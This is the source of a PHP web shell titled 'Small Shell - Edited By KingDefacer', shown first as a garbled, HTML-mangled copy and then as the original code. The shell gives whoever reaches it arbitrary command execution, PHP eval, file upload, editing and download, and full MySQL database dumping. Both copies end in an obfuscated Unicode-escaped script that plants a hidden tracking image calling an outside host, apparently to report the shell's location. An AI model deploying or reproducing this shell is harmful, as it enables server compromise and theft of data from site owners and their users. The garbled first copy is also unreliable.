for($i=0;$i<mysql_num_rows($result);$i++) {="" $rows="mysql_fetch_array($result);" $result2="@mysql_query('show" columns="" from="" `'.$rows[0].'`',$mysql_link);="" if(!$result2)$dump_file.="#error table " .$rows[0];="" else="" $dump_file.="create table `" .$rows[0]."`(\n";="" for($j="0;$j<mysql_num_rows($result2)-1;$j++)" $rows2="mysql_fetch_array($result2);" .$rows2[0].'`="" '.$rows2[1].($rows2[2]="='NO'&&$rows2[4]!='NULL'?'" not="" null="" default="" \''.$rows2[4].'\'':'="" null').",\n";="" }="" null')."\n";="" $type[$j]="$rows2[1];" ;="" mysql_free_result($result2);="" *="" $columns="$j-1;" .$rows[0].'`="" values="" (';="" for($k="0;$k<$columns;$k++)" if($archive="='none')" if($to_file)="" {fwrite($t_f,$dump_file);fflush($t_f);}="" echo($dump_file);="" ob_flush();="" $dump_file="" mysql_free_result($result);="" if($archive!="none" )="" header('content-length:="" '.strlen($dump_file)."\n");="" if($t_f)="" fclose($t_f);="" echo('dump="" for="" '.$db_dump.'="" now="" in="" '.$to_file);="" `'.$table_dump.'`',$mysql_link);="" if(!$result2)echo('error="" table="" '.$table_dump);="" if(!$to_file)="" header('content-type:="" application="" x-'.($archive="='none'?'octet-stream':'gzip')."\n");" header("content-disposition:="" attachment;="" filename="\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");" if($to_file="==false)" .$table_dump.'`="" echo="" $dump_file;="" }else="" break;="" case="" 'query'="" :="" echo($head.$pages);="" ?="">
<hr>
<form method="post">
<table>
<tbody><tr><td>
<textarea name="query" cols="120" rows="20"></textarea><table align="left">
<tbody><tr><td>User :<input name="user" type="text" value=""></td><td>Passwd :<input name="passwd" type="text" value=""></td><td>Host :<input name="host" type="text" value=""></td><td>DB :<input name="db" type="text" value=""></td></tr>
<tr></tr>
</tbody></table>
</td>
<td>
<input name="archive" type="radio" value="none">without arch
<input name="archive" type="radio" value="gzip" checked="true">gzip archive
<table>
<tbody><tr><td>DB :</td><td><input type="text" name="db_dump" value=""></td></tr>
<tr><td>Only Table :</td><td><input type="text" name="table_dump"></td></tr>
<tr><td><input type="submit" name="action" value="dump"></td></tr>
<tr><td>Save result to :</td><td><input type="text" name="to_file" value="" size="23"></td></tr>
</tbody></table>
</td>
</tr></tbody></table>
<input name="page" value="mysql" type="hidden">
<input name="action" value="query" type="submit">
</form>
<hr>
<!--?
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$result=@mysql_query($query,$mysql_link);
if(!($result))echo(mysql_error());
else
{
echo("<table valign=top align=left-->\n");
for($i=0;$i<mysql_num_fields($result);$i++) echo('<td=""><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> ');
echo("\n\n");
for($i=0;$i<mysql_num_rows($result);$i++) {="" $rows="mysql_fetch_array($result);" echo('<tr="" valign="top" align="left">');
for($j=0;$j<mysql_num_fields($result);$j++) {="" echo('<td="">'.(htmlspecialchars($rows[$j])).'');
}
echo("\n");
}
echo("\n");
}
mysql_close($mysql_link);
}
break;
}
}
break;
}
}
?>
<h1>Edited By KingDefacer</h1><h1>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script><img src="http://alturks.com/snf/s.php" width="1" height="1"></h1></mysql_num_fields($result);$j++)></mysql_num_rows($result);$i++)></mysql_num_fields($result);$i++)></mysql_num_rows($result);$i++)></pre></pre></pre></headka></body></html>Original PHP code
<?
##########################################################
# Small Shell - Edited By KingDefacer #
# +POST method #
# +MySQL Client+Dumper for DB and tables #
# +PHP eval in text format and html for phpinfo() example #
# PREVED: sn0w, Zadoxlik, KingDefacer, Rebz, SkvoznoY #
# All bugs -> alturks.com #
# Just for fun :) #
##########################################################
error_reporting(E_ALL);
@set_time_limit(0);
function magic_q($s)
{
if(get_magic_quotes_gpc())
{
$s=str_replace('\\\'','\'',$s);
$s=str_replace('\\\\','\\',$s);
$s=str_replace('\\"','"',$s);
$s=str_replace('\\\0','\0',$s);
}
return $s;
}
function get_perms($fn)
{
$mode=fileperms($fn);
$perms='';
$perms .= ($mode & 00400) ? 'r' : '-';
$perms .= ($mode & 00200) ? 'w' : '-';
$perms .= ($mode & 00100) ? 'x' : '-';
$perms .= ($mode & 00040) ? 'r' : '-';
$perms .= ($mode & 00020) ? 'w' : '-';
$perms .= ($mode & 00010) ? 'x' : '-';
$perms .= ($mode & 00004) ? 'r' : '-';
$perms .= ($mode & 00002) ? 'w' : '-';
$perms .= ($mode & 00001) ? 'x' : '-';
return $perms;
}
$head=<<<headka
<html>
<head>
<title>Small Shell - Edited By KingDefacer</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
<style>
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
</style>
headka;
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);
$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
switch($page)
{
case 'eval':
{
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
$eval_value=magic_q($eval_value);
$action=isset($_POST['action'])?$_POST['action']:'eval';
if($action=='eval_in_html') @eval($eval_value);
else
{
echo($head.$pages);
?>
<hr>
<form method=post>
<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
<input name='action' value='eval' type='submit'>
<input name='action' value='eval_in_html' type='submit'>
<input name='page' value='eval' type=hidden>
</form>
<hr>
<?
}
break;
}
case 'cmd':
{
$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
$action=isset($_POST['action'])?$_POST['action']:'cmd';
if(@is_dir($work_dir))
{
@chdir($work_dir);
$work_dir=getcwd();
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
}
else if(file_exists($work_dir))$work_dir=realpath($work_dir);
$work_dir=str_replace('\\','/',$work_dir);
$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
switch($action)
{
case 'cmd' :
{
echo($head.$pages);
?>
<form method='post' name='main_form'>
<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
<input name='page' value='cmd' type=hidden>
<input type=submit value='go'>
</form>
<form method=post>
<input name='cmd' type=text size=120 value='<?=str_replace('\'',''',$cmd)?>'>
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post enctype="multipart/form-data">
<input type="file" name="filename">
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post>
<input name='fname' type=text size=120><br>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre>
<?
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
else
{
$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
if(@is_dir($work_dir))
{
echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
$handle=@opendir($work_dir);
if($handle)
{
while(false!==($fn=readdir($handle))){$files[]=$fn;};
@closedir($handle);
sort($files);
$not_dirs=array();
for($i=0;$i<sizeof($files);$i++)
{
$fn=$files[$i];
if(is_dir($fn))
{
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
else {$not_dirs[]=$fn;}
}
for($i=0;$i<sizeof($not_dirs);$i++)
{
$fn=$not_dirs[$i];
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','"',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
echo('</pre><hr>');
?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120><br>
<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?
} else echo('Error Listing '.$e_work_dir);
}
else
switch($f_action)
{
case 'view':
{
echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
$f=@fopen($work_dir,'r');
?>
<form method=post>
<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
<input name='page' value='cmd' type=hidden>
<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
<input name='f_action' value='save' type=submit>
</form>
<?
break;
}
case 'save' :
{
$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
$f=@fopen($work_dir,'w');
if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
else
{
fwrite($f,$file_text);
fclose($f);
echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
}
break;
}
}
break;
}
break;
}
case 'upload' :
{
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
$f=$_FILES["filename"]["name"];
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
else
{
echo('file is uploaded in '.$e_work_dir);
}
break;
}
case 'download' :
{
$fname=isset($_POST['fname'])?$_POST['fname']:'';
$temp_file=isset($_POST['temp_file'])?'on':'nn';
$f=@fopen($fname,'r');
if(!($f)) echo('file is not exists');
else
{
$archive=isset($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip')
{
Header("Content-Type:application/x-gzip\n");
$s=gzencode(fread($f,filesize($fname)));
Header('Content-Length: '.strlen($s)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
echo($s);
}
else
{
Header("Content-Type:application/octet-stream\n");
Header('Content-Length: '.filesize($fname)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
ob_start();
while(feof($f)===false)
{
echo(fread($f,10000));
ob_flush();
}
}
}
}
}
break;
}
case 'mysql' :
{
$action=isset($_POST['action'])?$_POST['action']:'query';
$user=isset($_POST['user'])?$_POST['user']:'';
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
$db=isset($_POST['db'])?$_POST['db']:'';
$host=isset($_POST['host'])?$_POST['host']:'localhost';
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
switch($action)
{
case 'dump' :
{
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
if($table_dump=='')
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$result=mysql_query('show tables',$mysql_link);
for($i=0;$i<mysql_num_rows($result);$i++)
{
$rows=mysql_fetch_array($result);
$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
if(!$result2)$dump_file.='#error table '.$rows[0];
else
{
$dump_file.='create table `'.$rows[0]."`(\n";
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
mysql_free_result($result2);
$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<mysql_num_rows($result2);$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='insert into `'.$rows[0].'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
else
{
echo($dump_file);
ob_flush();
}
$dump_file='';
}
}
mysql_free_result($result2);
}
}
mysql_free_result($result);
if($archive!='none')
{
$dump_file=gzencode($dump_file);
header('Content-Length: '.strlen($dump_file)."\n");
echo($dump_file);
}
else if($t_f)
{
fclose($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
else
{
$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
if(!$result2)echo('error table '.$table_dump);
else
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
if($to_file===false)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$dump_file.="create table `{$table_dump}`(\n";
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
mysql_free_result($result2);
$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<mysql_num_rows($result2);$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='insert into `'.$table_dump.'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
else
{
echo($dump_file);
ob_flush();
}
$dump_file='';
}
}
mysql_free_result($result2);
if($archive!='none')
{
$dump_file=gzencode($dump_file);
header('Content-Length: '.strlen($dump_file)."\n");
echo $dump_file;
}else if($t_f)
{
fclose($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
}
}
}
break;
}
case 'query' :
{
echo($head.$pages);
?>
<hr>
<form method=post>
<table>
<td>
<table align=left>
<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
</table>
</td>
<td>
<table>
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<tr><td><input type=submit name='action' value='dump'></td></tr>
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
</table>
</td>
</table>
<input name='page' value='mysql' type=hidden>
<input name='action' value='query' type=submit>
</form>
<hr>
<?
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$result=@mysql_query($query,$mysql_link);
if(!($result))echo(mysql_error());
else
{
echo("<table valign=top align=left>\n<tr>");
for($i=0;$i<mysql_num_fields($result);$i++)
echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>');
echo("\n</tr>\n");
for($i=0;$i<mysql_num_rows($result);$i++)
{
$rows=mysql_fetch_array($result);
echo('<tr valign=top align=left>');
for($j=0;$j<mysql_num_fields($result);$j++)
{
echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
}
echo("</tr>\n");
}
echo("</table>\n");
}
mysql_close($mysql_link);
}
break;
}
}
break;
}
}
?>
<h1>Edited By KingDefacer<h1>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>